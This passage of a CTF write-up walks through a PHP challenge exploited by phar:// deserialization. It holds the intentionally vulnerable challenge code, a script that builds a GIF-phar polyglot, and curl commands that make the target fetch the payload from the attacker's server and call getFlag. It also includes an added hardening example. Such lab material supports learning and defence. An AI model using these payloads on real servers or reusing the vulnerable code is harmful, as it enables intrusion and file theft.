class="title">Admin</span> <span class="keyword">extends</span> <span class="title">User</span> </span>{ </span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>{ <span class="comment">// Destructor</span></span><br><span class="line"> $_GET[<span class="string">"lucky"</span>](); <span class="comment">// PHP calls a function whose name is taken from the GET parameter</span></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">randomkeys</span><span class="params">($length)</span></span>{ <span class="comment">// Define the random-key generator</span></span><br><span class="line"> $output=<span class="string">''</span>; </span><br><span class="line"> <span class="keyword">for</span> ($a = <span class="number">0</span>; $a<$length; $a++) { </span><br><span class="line"> $output .= chr(mt_rand(<span class="number">0</span>, <span class="number">0xFF</span>)); <span class="comment">// One random byte from PHP's mt_rand </span></span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> $output; </span><br><span class="line"> } </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span><span class="params">()</span> </span>{ <span class="comment">// Define the flag reader</span></span><br><span class="line"> $flag = file_get_contents(<span class="string">"/flag"</span>); <span class="comment">// Read the file contents into $flag</span></span><br><span class="line"> <span class="keyword">echo</span> $flag; <span class="comment">// Output the flag</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_session</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $SECRET;</span><br><span class="line"> $data = $_COOKIE[<span class="string">"session-data"</span>];</span><br><span class="line"> <span class="keyword">list</span>($data, $hmac) = explode(<span class="string">"-----"</span>, $data, <span class="number">2</span>); <span class="comment">// Split the cookie into the data and the HMAC signature (explode the string into an array)</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span>($data, $hmac) || !is_string($data) || !is_string($hmac)) { <span class="comment"># Check for missing values</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Bye"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!hash_equals(hash_hmac(<span class="string">"sha1"</span>, $data, $SECRET), $hmac)) { <span class="comment">// Verify that the HMAC of the data matches the signature</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Bye Bye"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> $data = unserialize($data); <span class="comment">// Deserialize</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span>($data->avatar)) { <span class="comment">// If the deserialized object has no avatar member, print a message and exit the script</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Bye Bye Bye"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> $data->avatar; <span class="comment">// Return the upload path </span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">upload</span><span class="params">($path)</span> </span>{</span><br><span class="line"> <span class="comment">// Check that the file header is GIF89a; if it is not, return "fuck off"</span></span><br><span class="line"> $data = file_get_contents($_GET[<span class="string">"url"</span>] . 
<span class="string">"/avatar.gif"</span>);</span><br><span class="line"> <span class="keyword">if</span> (substr($data, <span class="number">0</span>, <span class="number">6</span>) !== <span class="string">"GIF89a"</span>) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Fuck off"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> file_put_contents($path . <span class="string">"/avatar.gif"</span>, $data); <span class="comment">//把一个$data写入(路径)/avatar.gif文件中</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Upload OK"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show</span><span class="params">($path)</span> </span>{</span><br><span class="line"> <span class="comment">// 查看/avatar.gif</span></span><br><span class="line"> <span class="keyword">if</span> (!file_exists($path . <span class="string">"/avatar.gif"</span>)) { <span class="comment">//查文件或目录是否存在</span></span><br><span class="line"> $path = <span class="string">"/var/www/html"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> header(<span class="string">"Content-Type: image/gif"</span>); <span class="comment">//gif图片格式 </span></span><br><span class="line"> <span class="keyword">die</span>(file_get_contents($path . 
<span class="string">"/avatar.gif"</span>)); <span class="comment">//将文件内容读入输出并退出</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$mode = $_GET[<span class="string">"m"</span>];</span><br><span class="line"><span class="keyword">if</span> ($mode == <span class="string">"upload"</span>) {</span><br><span class="line"> upload(check_session()); <span class="comment">//从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 请求url中的内容写到该路径下的avatar.gif文件中</span></span><br><span class="line">} <span class="keyword">else</span> <span class="keyword">if</span> ($mode == <span class="string">"show"</span>) {</span><br><span class="line"> show(check_session()); <span class="comment">//从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 展示该目录下的avatar.gif</span></span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>); <span class="comment">//对取得当前文件的绝对地址文件进行语法高亮显示</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="Analysis"></a>Analysis</h4><p>Start by analysing the code. It defines a getFlag function, and calling it prints the flag, so the whole challenge comes down to getting that function called.</p>
<p>The challenge offers two features: writing an arbitrary gif into the sandbox directory, and viewing that gif from the path stored in the cookie.</p>
<h5 id="初步想法"><a href="#初步想法" class="headerlink" title="First idea"></a>First idea</h5><p>Admin is the key class: its destructor, which runs after deserialization, calls whatever function the lucky parameter names, so it could call getFlag and print the flag. The deserialized data comes from the cookie, so the first idea is to forge the cookie. But the second half of the cookie is a signature produced by hash_hmac with an unknown secret key, so the check cannot be bypassed and forging the cookie is practically impossible.</p>
<h5 id="本题考点"><a href="#本题考点" class="headerlink" title="Key point of this challenge"></a>Key point of this challenge</h5><p>When PHP opens a Phar archive, parsing the archive's metadata deserializes it, so a file function that is handed a phar:// path becomes an unserialize() sink.</p>
<p><a href="https://www.php.net/manual/zh/phar.getmetadata.php" target="_blank" rel="noopener">https://www.php.net/manual/zh/phar.getmetadata.php</a></p>
<p><a href="https://scriptkid-beta.github.io/2020/06/09/Phar/">Phar://</a></p>
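<p>The fix, from the defender's side, has to happen before file_get_contents() ever sees the attacker-controlled URL. The following hardened upload() is an added example, not the challenge's or HITCON's own code; it keeps the challenge's layout ($path is the per-client sandbox directory), and the helper names fetch_remote_avatar, looks_like_phar and is_plain_gif are hypothetical.</p>

```php
<?php
// Added hardening example, not the challenge's or HITCON's own code. It keeps
// the challenge's layout ($path is the per-client sandbox directory); the
// helper names fetch_remote_avatar / looks_like_phar / is_plain_gif are
// hypothetical.

// 1. Take the phar:// wrapper away for the whole request. file_get_contents()
//    on a phar:// path is what deserializes the archive metadata; phar.readonly
//    only blocks writing and does not stop this.
@stream_wrapper_unregister('phar');

// 2. Only plain http(s) URLs may be fetched: any other wrapper (phar://,
//    file://, php://, ...) is refused before it reaches a file function.
function fetch_remote_avatar(string $url) {
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;
    }
    return @file_get_contents(rtrim($url, '/') . '/avatar.gif');
}

// 3. The plain phar format needs the literal __HALT_COMPILER token in its stub,
//    so its presence flags a GIF/phar polyglot. This is a heuristic only (tar-
//    and zip-based phars do not need it); step 1 is the actual guarantee.
function looks_like_phar(string $data): bool {
    return stripos($data, '__HALT_COMPILER') !== false;
}

// A six-byte "GIF89a" prefix is not a GIF check, and getimagesize() alone does
// not reliably reject a stub that starts with those bytes either.
function is_plain_gif(string $data): bool {
    if (!in_array(substr($data, 0, 6), ['GIF87a', 'GIF89a'], true)) {
        return false;
    }
    $info = @getimagesizefromstring($data);
    return $info !== false && $info[2] === IMAGETYPE_GIF && !looks_like_phar($data);
}

function upload_hardened(string $path): void {
    $data = fetch_remote_avatar($_GET['url'] ?? '');
    if ($data === false || !is_plain_gif($data)) {
        die("Bye");
    }
    file_put_contents($path . '/avatar.gif', $data);
    die("Upload OK");
}
```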
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="Solution steps"></a>Solution steps</h4><h5 id="方式一"><a href="#方式一" class="headerlink" title="Method one"></a>Method one</h5><p>Generate a phar file with a GIF header and rename its extension to gif.</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">Admin</span></span>{</span><br><span class="line"> }</span><br><span class="line"> $phar = <span class="keyword">new</span> Phar(<span class="string">"avatar.phar"</span>); <span class="comment">//the extension must be phar</span></span><br><span class="line"> $phar->startBuffering();</span><br><span class="line"> $phar->setStub(<span class="string">"GIF89a"</span>.<span class="string">"<?php __HALT_COMPILER(); ?>"</span>); <span class="comment">//set the stub, prefixed with the gif file header</span></span><br><span class="line"> $o = <span class="keyword">new</span> Admin();</span><br><span class="line"> $phar->setMetadata($o); <span class="comment">//store the custom meta-data in the manifest</span></span><br><span class="line"> $phar->addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">// add a file to the archive</span></span><br><span class="line"> $phar->stopBuffering(); <span class="comment">// the signature is computed automatically</span></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Put the generated gif on an http server you control (here a temporary local python server).</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200611132224047.png" alt="image-20200611132224047"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http://www.xxxx.com/index.php?m=upload&url=http://10.255.252.192:8000</span><br><span class="line"></span><br><span class="line">http://www.xxxx.com/index.php?m=upload&url=phar:///var/www/data/Y3RmMTAuMjU1LjI1Mi4xOTI=&lucky=getFlag</span><br><span class="line">Note: the base64 string (Y3RmMTAuMjU1LjI1Mi4xOTI=) is the base64 encoding of (ctf + the IP address)</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200609084749799.png" alt=""></p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200609085038212.png" alt="image-20200609085038212"></p>
<h5 id="方式二"><a href="#方式二" class="headerlink" title="Method two"></a>Method two</h5><p>Generate a phar file with a GIF header and rename its extension to gif.</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">Admin</span></span>{</span><br><span class="line"> }</span><br><span class="line"> $phar = <span class="keyword">new</span> Phar(<span class="string">"avatar.phar"</span>); <span class="comment">//the extension must be phar</span></span><br><span class="line"> $phar->startBuffering();</span><br><span class="line"> $phar->setStub(<span class="string">"GIF89a"</span>.<span class="string">"<?php __HALT_COMPILER(); ?>"</span>); <span class="comment">//set the stub, prefixed with the gif file header</span></span><br><span class="line"> $o = <span class="keyword">new</span> Admin();</span><br><span class="line"> $phar->setMetadata($o); <span class="comment">//store the custom meta-data in the manifest</span></span><br><span class="line"> $phar->addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">// add a file to the archive</span></span><br><span class="line"> $phar->stopBuffering(); <span class="comment">// the signature is computed automatically</span></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Put the generated gif on an http server you control (here a temporary local python server).</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200611132224047.png" alt="image-20200611132224047"></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">curl --cookie-jar idlefire <span class="string">"http://www.xxxx.com/index.php"</span></span><br><span class="line"></span><br><span class="line">curl -b idlefire <span class="string">"http://www.xxxx.com/index.php?m=upload&url=http://10.255.252.192:8000/"</span></span><br><span class="line"></span><br><span class="line">curl -b idlefire <span class="string">"http://www.xxxx.com/index.php?m=upload&url=phar:///var/www/data/Y3RmMTAuMjU1LjI1Mi4xOTI=&lucky=getFlag"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Note: the base64 string (Y3RmMTAuMjU1LjI1Mi4xOTI=) is the base64 encoding of (ctf + the IP address)</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200609085312907.png" alt="image-20200609085312907"></p>
<h4 id="写到最后"><a href="#写到最后" class="headerlink" title="Closing remarks"></a>Closing remarks</h4><p>This challenge is adapted from the classic <a href="https://github.com/t3hp0rP/hitconDockerfile/tree/master/hitcon-ctf-2017/baby^h-master-php-2017" target="_blank" rel="noopener">hitcon-ctf-2017 baby^h-master-php-2017</a>, with the difficulty lowered somewhat.</p>
<h4 id="参考"><a href="#参考" class="headerlink" title="References"></a>References</h4><p><a href="https://www.jianshu.com/p/19e3ee990cb7" target="_blank" rel="noopener">https://www.jianshu.com/p/19e3ee990cb7</a></p>
<p><a href="https://www.bilibili.com/read/cv6347230/" target="_blank" rel="noopener">https://www.bilibili.com/read/cv6347230/</a></p>
<p><a href="https://xz.aliyun.com/t/1773/" target="_blank" rel="noopener">https://xz.aliyun.com/t/1773/</a></p>
<p><a href="https://www.cnblogs.com/jxkshu/p/4997219.html" target="_blank" rel="noopener">https://www.cnblogs.com/jxkshu/p/4997219.html</a></p>
]]></content>
<tags>